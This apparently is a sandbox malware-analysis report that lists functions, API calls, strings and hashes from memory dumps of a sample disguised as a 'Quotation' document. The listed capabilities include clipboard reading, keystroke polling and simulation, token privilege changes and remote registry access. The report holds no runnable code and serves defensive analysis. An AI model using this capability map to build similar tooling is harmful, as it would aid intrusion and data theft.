Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 0638cbfdcc47858371b05b25443b1b5f2d32dd1d2d2ba6330610c82424f91010
Instruction ID: 108957643d94633fbdcb7070483829a232f6755e6eac3998f00fff27a3975fce
Opcode Fuzzy Hash: 0638cbfdcc47858371b05b25443b1b5f2d32dd1d2d2ba6330610c82424f91010
Instruction Fuzzy Hash: 3612A071504208ABEF258F68CC49FAF7BB9EF8A714F20456EF515EA2A1DB748941CB10

Function 0092710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009275C2
_memset.LIBCMT ref: 009276B1
_memmove.LIBCMT ref: 00927C4B
_memmove.LIBCMT ref: 00927E4F

Strings

DEFINE, xrefs: 009625AF
[:>:]], xrefs: 0092760A
\b(?=\w), xrefs: 00963C34
[:<:]], xrefs: 009275F1
\b(?<=\w), xrefs: 00963C41
Q\E, xrefs: 009281C1

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: 26420033a8e13479e257bc0e9c6b4a2c3282b0b6e6cfe089dfb7138868d36505
Instruction ID: 395a76e7c5e89a45982a45cde14170c317bf914c7b393d5eee027d59306faee1
Opcode Fuzzy Hash: 26420033a8e13479e257bc0e9c6b4a2c3282b0b6e6cfe089dfb7138868d36505
Instruction Fuzzy Hash: E693B171E04216DFDB24CFA8D881BADB7B5FF48310F25856AE945EB284E7749E81CB40

Function 00914A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00914A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0094DA8E
IsIconic.USER32(?), ref: 0094DA97
ShowWindow.USER32(?,00000009), ref: 0094DAA4
SetForegroundWindow.USER32(?), ref: 0094DAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0094DAC4
GetCurrentThreadId.KERNEL32 ref: 0094DACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 0094DAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 0094DAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 0094DAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 0094DAF8
SetForegroundWindow.USER32(?), ref: 0094DAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 0094DB10
keybd_event.USER32(00000012,00000000), ref: 0094DB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 0094DB25
keybd_event.USER32(00000012,00000000), ref: 0094DB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 0094DB33
keybd_event.USER32(00000012,00000000), ref: 0094DB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 0094DB42
keybd_event.USER32(00000012,00000000), ref: 0094DB47
SetForegroundWindow.USER32(?), ref: 0094DB4A
AttachThreadInput.USER32(?,?,00000000), ref: 0094DB71

Strings

Shell_TrayWnd, xrefs: 0094DA89

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 770da0279031037d55822dad47b025fefc0958c83a7a3ca6e52c2ce1c4771e16
Instruction ID: 3c77961f0e26c297520a8d0acb57881a12e2abade36bd6d8a6ce6b0723f6fb23
Opcode Fuzzy Hash: 770da0279031037d55822dad47b025fefc0958c83a7a3ca6e52c2ce1c4771e16
Instruction Fuzzy Hash: AA318175A94318BBEB206FA59C49F7F7E6CEB44B50F114026FA04EA1D0C6B05D10BBA1

Function 00968858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00968CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00968D0D
Part of subcall function 00968CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00968D3A
Part of subcall function 00968CC3: GetLastError.KERNEL32 ref: 00968D47

_memset.LIBCMT ref: 0096889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009688ED
CloseHandle.KERNEL32(?), ref: 009688FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00968915
GetProcessWindowStation.USER32 ref: 0096892E
SetProcessWindowStation.USER32(00000000), ref: 00968938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00968952

Part of subcall function 00968713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00968851), ref: 00968728
Part of subcall function 00968713: CloseHandle.KERNEL32(?,?,00968851), ref: 0096873A

Strings

, xrefs: 009688AA
default, xrefs: 0096894D
winsta0, xrefs: 00968910

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 8acb4b7e395b449f77755dbe78ae245e0739e24f0b1635c0a8046f6eb1ef97b8
Instruction ID: e55da45a25ae521789d39c5773956b2b2e09e31675fdb60cc1ece95f62196e00
Opcode Fuzzy Hash: 8acb4b7e395b449f77755dbe78ae245e0739e24f0b1635c0a8046f6eb1ef97b8
Instruction Fuzzy Hash: 658139B1950209AFDF11DFE4DC45AEFBBBCEF04304F18426AFD10A6261DB358A159B60

Function 0098425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0099F910), ref: 00984284
IsClipboardFormatAvailable.USER32(0000000D), ref: 00984292
GetClipboardData.USER32(0000000D), ref: 0098429A
CloseClipboard.USER32 ref: 009842A6
GlobalLock.KERNEL32(00000000), ref: 009842C2
CloseClipboard.USER32 ref: 009842CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 009842E1
IsClipboardFormatAvailable.USER32(00000001), ref: 009842EE
GetClipboardData.USER32(00000001), ref: 009842F6
GlobalLock.KERNEL32(00000000), ref: 00984303
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00984337
CloseClipboard.USER32 ref: 00984447

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 16e7cb3bdea40132357bedb81d28c35af17ad816c700c5936639602b3102b63b
Instruction ID: bff32392b0ed0757c6ebf994c964d5cf59f1a8ffa5ae202a9b1276231cd937ec
Opcode Fuzzy Hash: 16e7cb3bdea40132357bedb81d28c35af17ad816c700c5936639602b3102b63b
Instruction Fuzzy Hash: E851B471308306ABD701FF64EC95FAEB7A8AF84B00F10452AF566D22B1DF70D9449B62

Function 0097C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0097C9F8
FindClose.KERNEL32(00000000), ref: 0097CA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0097CA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0097CA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 0097CAAF
__swprintf.LIBCMT ref: 0097CAFB
__swprintf.LIBCMT ref: 0097CB3E

Part of subcall function 00917F41: _memmove.LIBCMT ref: 00917F82

__swprintf.LIBCMT ref: 0097CB92

Part of subcall function 009338D8: __woutput_l.LIBCMT ref: 00933931

__swprintf.LIBCMT ref: 0097CBE0

Part of subcall function 009338D8: __flsbuf.LIBCMT ref: 00933953
Part of subcall function 009338D8: __flsbuf.LIBCMT ref: 0093396B

__swprintf.LIBCMT ref: 0097CC2F
__swprintf.LIBCMT ref: 0097CC7E
__swprintf.LIBCMT ref: 0097CCCD

Strings

%02d, xrefs: 0097CB86, 0097CB90, 0097CBDE, 0097CC2D, 0097CC7C, 0097CCCB
%4d%02d%02d%02d%02d%02d, xrefs: 0097CAF5
%4d, xrefs: 0097CB38

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 951012874a203465135eb48c5933669f03dd03f218c195a12d8743002e879345
Instruction ID: 0faba3d377c875199d1c34aa9cf5f1d40f8a28932423361da09027d426126a81
Opcode Fuzzy Hash: 951012874a203465135eb48c5933669f03dd03f218c195a12d8743002e879345
Instruction Fuzzy Hash: 76A140B2608308ABC710EB64C995EEFB7ECEFD4701F40491DB596C3191EA34DA49CB62

Function 0097F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0097F221
_wcscmp.LIBCMT ref: 0097F236
_wcscmp.LIBCMT ref: 0097F24D
GetFileAttributesW.KERNEL32(?), ref: 0097F25F
SetFileAttributesW.KERNEL32(?,?), ref: 0097F279
FindNextFileW.KERNEL32(00000000,?), ref: 0097F291
FindClose.KERNEL32(00000000), ref: 0097F29C
FindFirstFileW.KERNEL32(*.*,?), ref: 0097F2B8
_wcscmp.LIBCMT ref: 0097F2DF
_wcscmp.LIBCMT ref: 0097F2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 0097F308
SetCurrentDirectoryW.KERNEL32(009CA5A0), ref: 0097F326
FindNextFileW.KERNEL32(00000000,00000010), ref: 0097F330
FindClose.KERNEL32(00000000), ref: 0097F33D
FindClose.KERNEL32(00000000), ref: 0097F34F

Strings

*.*, xrefs: 0097F2B3

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 5ed03502d0127e6311647be133a2440b576f45220f5b5237f66a6586bf2e1c2f
Instruction ID: a65f1c60d69ae9f26e630b01bbe339f3994bf7a7f22f4580329e6bf0d7f84e82
Opcode Fuzzy Hash: 5ed03502d0127e6311647be133a2440b576f45220f5b5237f66a6586bf2e1c2f
Instruction Fuzzy Hash: EF31B3776002196ADF10DBB4DC69BEEB3ACAF483A4F148176E818E3090EB34DE45DA54

Function 00990AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00990BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,0099F910,00000000,?,00000000,?,?), ref: 00990C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00990C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00990D1D
RegCloseKey.ADVAPI32(?), ref: 0099103D
RegCloseKey.ADVAPI32(00000000), ref: 0099104A

Strings

REG_SZ, xrefs: 00990D5B
REG_EXPAND_SZ, xrefs: 00990CBA
REG_MULTI_SZ, xrefs: 00990E05
REG_DWORD, xrefs: 00990F0E
REG_BINARY, xrefs: 00990FD8
REG_QWORD, xrefs: 00990F8B

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 20e03c06efd7d181852b28d9df4c42ceb1e4d54b8a44a85a62c5ec3c05c3f76b
Instruction ID: 85185bc95e5d73a967bfb3c1065a020c2d773754116e7dfd4a92ee6c1576f39c
Opcode Fuzzy Hash: 20e03c06efd7d181852b28d9df4c42ceb1e4d54b8a44a85a62c5ec3c05c3f76b
Instruction Fuzzy Hash: 1B0249756046119FCB14EF18C891E6AB7E5FF89714F04885DF89A9B3A2CB31ED41CB81

Function 0097F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0097F37E
_wcscmp.LIBCMT ref: 0097F393
_wcscmp.LIBCMT ref: 0097F3AA

Part of subcall function 009745C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009745DC

FindNextFileW.KERNEL32(00000000,?), ref: 0097F3D9
FindClose.KERNEL32(00000000), ref: 0097F3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 0097F400
_wcscmp.LIBCMT ref: 0097F427
_wcscmp.LIBCMT ref: 0097F43E
SetCurrentDirectoryW.KERNEL32(?), ref: 0097F450
SetCurrentDirectoryW.KERNEL32(009CA5A0), ref: 0097F46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 0097F478
FindClose.KERNEL32(00000000), ref: 0097F485
FindClose.KERNEL32(00000000), ref: 0097F497

Strings

*.*, xrefs: 0097F3FB

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 60e7ba6b3d83a694497654c2dabd46e68a3137075300c908612924a281a8d4f6
Instruction ID: 24b70f9ccae85ab8253bf3b5971fdfbdca42ea714888261209e085d58e68c8fe
Opcode Fuzzy Hash: 60e7ba6b3d83a694497654c2dabd46e68a3137075300c908612924a281a8d4f6
Instruction Fuzzy Hash: 0031D5735052196BCF10AB78ECA9BDEB7AC9F89364F148275F818E30A0D734DE44DA64

Function 009681F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0096874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00968766
Part of subcall function 0096874A: GetLastError.KERNEL32(?,0096822A,?,?,?), ref: 00968770
Part of subcall function 0096874A: GetProcessHeap.KERNEL32(00000008,?,?,0096822A,?,?,?), ref: 0096877F
Part of subcall function 0096874A: HeapAlloc.KERNEL32(00000000,?,0096822A,?,?,?), ref: 00968786
Part of subcall function 0096874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0096879D

Part of subcall function 009687E7: GetProcessHeap.KERNEL32(00000008,00968240,00000000,00000000,?,00968240,?), ref: 009687F3
Part of subcall function 009687E7: HeapAlloc.KERNEL32(00000000,?,00968240,?), ref: 009687FA
Part of subcall function 009687E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00968240,?), ref: 0096880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0096825B
_memset.LIBCMT ref: 00968270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0096828F
GetLengthSid.ADVAPI32(?), ref: 009682A0
GetAce.ADVAPI32(?,00000000,?), ref: 009682DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009682F9
GetLengthSid.ADVAPI32(?), ref: 00968316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00968325
HeapAlloc.KERNEL32(00000000), ref: 0096832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0096834D
CopySid.ADVAPI32(00000000), ref: 00968354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00968385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009683AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 009683BF

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 1123b092b5eb9c7abd964ea42a223b5d709bf6fbd1b31148e9fe4f9f3ae3dbf4
Instruction ID: 070bc71999b66d8a26c8e7bb171829f4b37b28549ec5150d5ab659011bff83e6
Opcode Fuzzy Hash: 1123b092b5eb9c7abd964ea42a223b5d709bf6fbd1b31148e9fe4f9f3ae3dbf4
Instruction Fuzzy Hash: 93614B71904209ABDF109FA4DC58EAEBBBDFF04700F14826AE815EA291DB319A15DB60

Function 00926843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

UCP), xrefs: 00961546
UTF16), xrefs: 00961508
NO_AUTO_POSSESS), xrefs: 00961567
ANY), xrefs: 00961717
ANYCRLF), xrefs: 00961734
CR), xrefs: 009616C0
LF), xrefs: 009616DD
BSR_ANYCRLF), xrefs: 00961757
CRLF), xrefs: 009616FA
UTF), xrefs: 00961533
LIMIT_MATCH=, xrefs: 009615A9
LIMIT_RECURSION=, xrefs: 00961635
BSR_UNICODE), xrefs: 00961771
NO_START_OPT), xrefs: 00961588

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 56749c0894084e9c94d1260db957353d63b8c10364de39e1509e4dcb5b66a702
Instruction ID: 6246d25d3e1e406793532cfae6a6e93c25466d0d7291698d473037447f331e3c
Opcode Fuzzy Hash: 56749c0894084e9c94d1260db957353d63b8c10364de39e1509e4dcb5b66a702
Instruction Fuzzy Hash: E1728075E002299BDF24CF58D8807AEB7F5FF48310F18856AE849EB694DB749D81CB90

Function 00990665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00990038,?,?), ref: 009910BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00990737

Part of subcall function 00919997: __itow.LIBCMT ref: 009199C2
Part of subcall function 00919997: __swprintf.LIBCMT ref: 00919A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009907D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0099086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00990AAD
RegCloseKey.ADVAPI32(00000000), ref: 00990ABA

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 4c2502d51a3b45d836140d113e3f468c194f3d39806e4f83c448d76a2b1efa82
Instruction ID: 3f767ed18be4a6a0e0b41b5e9118a3e8e62e2447dd4b61258ff29055edda820e
Opcode Fuzzy Hash: 4c2502d51a3b45d836140d113e3f468c194f3d39806e4f83c448d76a2b1efa82
Instruction Fuzzy Hash: FFE14D31604214AFCB14DF28C895E6ABBE9FFC9714F04896DF45ADB262DA30ED41CB51

Function 00970219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00970241
GetAsyncKeyState.USER32(000000A0), ref: 009702C2
GetKeyState.USER32(000000A0), ref: 009702DD
GetAsyncKeyState.USER32(000000A1), ref: 009702F7
GetKeyState.USER32(000000A1), ref: 0097030C
GetAsyncKeyState.USER32(00000011), ref: 00970324
GetKeyState.USER32(00000011), ref: 00970336
GetAsyncKeyState.USER32(00000012), ref: 0097034E
GetKeyState.USER32(00000012), ref: 00970360
GetAsyncKeyState.USER32(0000005B), ref: 00970378
GetKeyState.USER32(0000005B), ref: 0097038A

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: efd49278fa2db0affb60d50f27049d650745db924a98c830558ce6869db100f6
Instruction ID: 172a8a91be0f731651814361d8f8bda2ff236079d7d5e70166bb4c34f28beb30
Opcode Fuzzy Hash: efd49278fa2db0affb60d50f27049d650745db924a98c830558ce6869db100f6
Instruction Fuzzy Hash: B741CB265087C9EEFF314A6484183B5FEA86F91340F08C09ED5CD465C3E79559C48792

Function 009886D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00919997: __itow.LIBCMT ref: 009199C2
Part of subcall function 00919997: __swprintf.LIBCMT ref: 00919A0C

CoInitialize.OLE32 ref: 00988718
CoUninitialize.OLE32 ref: 00988723
CoCreateInstance.OLE32(?,00000000,00000017,009A2BEC,?), ref: 00988783
IIDFromString.OLE32(?,?), ref: 009887F6
